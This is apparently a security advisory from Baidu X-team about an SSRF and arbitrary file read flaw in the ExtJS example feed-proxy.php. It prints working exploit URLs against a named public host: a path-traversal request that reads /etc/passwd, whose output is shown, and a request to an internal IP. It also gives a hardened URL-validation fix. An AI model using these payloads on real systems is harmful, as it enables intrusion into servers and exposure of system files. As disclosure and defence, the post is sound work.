Hi all:
Baidu Security Team found a vulnerability in ExtJS; with this vulnerability we can read arbitrary files and request internal HTTP services.
File: /examples/feed-viewer/feed-proxy.php, lines 3-6:

```php
<?php
// Vulnerable check: only tests that the value *starts* with "http", so a relative path like "http/../../etc/passwd" passes and is read from disk
$feed = $_REQUEST['feed'];
if($feed != '' && strpos($feed, 'http') === 0){
    header('Content-Type: text/xml');
    $xml = file_get_contents($feed);
    echo $xml;
}
```
When we request a URL like this:
http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1
if the resource exists, we get the internal HTTP service's response back.
Because the only check is "strpos($feed, 'http') === 0", we can request this URL to bypass the restriction and achieve arbitrary file read:
http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd
Viewing the HTML source of the response shows the file contents:
```text
root:x:0:0:Web-useast4 root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
ntp:x:105:111::/home/ntp:/bin/false
snmp:x:106:112::/var/lib/snmp:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
postfix:x:108:114::/var/spool/postfix:/bin/false
```
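The root cause is that a prefix test on the raw string is not URL validation. The following is an added example of a hardened check for this proxy; it is not ExtJS code and the function name `is_allowed_feed_url` is our own. It parses the value, requires an absolute http(s) URL with a host (so `http/../../etc/passwd`, which has no scheme, is rejected), and refuses hosts that resolve to private or reserved addresses (so `http://10.1.1.1` is rejected), which addresses both the file read and the internal-service request:

```php
<?php
// Added example, not part of ExtJS: a safer replacement for the check in feed-proxy.php.
function is_allowed_feed_url(string $feed): bool {
    $parts = parse_url($feed);
    if ($parts === false) {
        return false;
    }
    // A relative path such as "http/../../../etc/passwd" yields no scheme/host: reject.
    if (!isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // Only plain http(s); no file://, php://, gopher:// etc.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // No embedded credentials (user:pass@host).
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }
    // Resolve the host and refuse private (10/8, 172.16/12, 192.168/16) and
    // reserved (127/8, 169.254/16, 0/8 ...) ranges to block internal-service requests.
    // Caveat: gethostbynamel() returns IPv4 only and does not defend against DNS
    // rebinding; a production proxy should also pin the resolved IP for the fetch.
    $ips = gethostbynamel($parts['host']);
    if ($ips === false || $ips === []) {
        return false;
    }
    foreach ($ips as $ip) {
        $ok = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
        if ($ok === false) {
            return false;
        }
    }
    return true;
}

$feed = $_REQUEST['feed'] ?? '';
if (!is_allowed_feed_url($feed)) {
    http_response_code(400);
    exit('invalid feed url');
}
// Do not follow redirects: a public host could otherwise 302 the proxy to an internal address.
$ctx = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
header('Content-Type: text/xml');
echo file_get_contents($feed, false, $ctx);
```

Independently of the code fix, shipping the `/examples/` tree on a production host is itself the exposure here; removing it is the simplest mitigation.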
Submitter: zhanghao@Baidu X-team, gaojianfeng@Baidu X-team, shitong@Baidu X-team
________________________________
Id:Yaseng
Hi: Hisengberg
Team: Baidu X-team
E-mail: [email protected]